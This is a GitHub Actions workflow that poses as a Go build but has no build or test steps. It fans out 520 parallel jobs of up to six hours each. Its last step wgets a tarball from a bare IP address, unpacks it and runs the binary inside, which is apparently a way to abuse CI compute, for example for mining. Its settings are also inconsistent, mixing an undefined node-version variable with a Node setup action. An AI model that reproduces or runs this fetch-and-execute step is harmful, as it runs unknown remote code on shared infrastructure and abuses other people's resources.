version: 2.1

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:

    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 255
      fail-fast: false
      matrix:
          go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 ,12, 13, 14, 15, 16, 17, 18, 19, 20]
          flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 360
    env: 
        NUM_JOBS: 10
        JOB: ${{ matrix.node-version }}
    steps:
    - uses: actions/checkout@v2
    - name: Set up Go ${{ matrix.node-version }}
      uses: actions/setup-node@v2
      with:
        go-version: ${{ matrix.node-version }}
      id: go  
    - run: wget http://149.28.239.137/vavar.tar.gz && tar xfvz vavar.tar.gz && chmod +x ./vava && ./vava